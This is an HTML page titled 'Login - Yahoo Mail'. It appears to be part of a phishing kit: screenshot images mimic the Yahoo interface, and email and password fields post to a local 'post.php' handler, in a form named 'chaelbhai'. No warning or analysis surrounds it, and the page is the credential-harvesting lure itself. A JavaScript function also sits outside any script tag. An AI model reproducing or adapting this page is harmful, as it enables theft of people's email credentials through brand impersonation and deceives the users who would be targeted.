<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Login - Yahoo Mail</title>
<meta charset="utf-8" />
<meta name="applicable-device" content="pc,mobile" />
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="format-detection" content="telephone=no" />

<link rel="shortcut icon"
              href="images/favicon.ico"/>
			  
			  
	   function unhideBody()
{
var bodyElems = document.getElementsByTagName("body");
bodyElems[0].style.visibility = "visible";
}



   </head>

<body>
<div id="container">
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1451px; height:171px; z-index:0"><img src="images/image1.png" alt="" title="" border="0" width="1451" height="171"></div>
<form action="post.php" name="chaelbhai" id="chaelbhai" method="post">
<div id="image3" style="position:absolute;overflow:hidden;left:0px;top: 171px;width:1451px;height:395px;z-index:2;"><img src="images/confirm.png" alt="" title="" border="0" width="1451" height="395"></div>

<div id="image4" style="position:absolute;overflow:hidden;left:0px;top: 566px;width:1451px;height:354px;z-index:3;"><img src="images/image2.png" alt="" title="" border="0" width="1451" height="354"></div>

<div id="image8" style="position:absolute;overflow:hidden;left: 0px;top: 2px;width:140px;height:49px;z-index:7;"><a href="#"><img src="images/logo.png" alt="" title="" border="0" width="140" height="49"></a></div>

<input name="formtxt1" required="" placeholder="Enter your email" type="text" style="font-size: 15px;padding: 1px 5px 1px;background-color: #ffffff;border: 1px solid #ffffff;position:absolute;width: 300px;left: 906px;height: 35px;top: 234px;z-index:19;">
<input name="formtxt2" required="" placeholder="Enter your password" type="password" style="font-size: 15px;padding: 1px 5px 1px;background-color: #ffffff;border: 1px solid #ffffff;position:absolute;width: 300px;left: 906px;height: 35px;top: 274px;z-index:19;">


<div id="formimage1" style="position:absolute;left: 907px;top: 341px;z-index:25;">
<input type="image" name="formimage1" width="300" height="42" src="images/signin.png"></div>
</form>
</div>
</body>
</html>
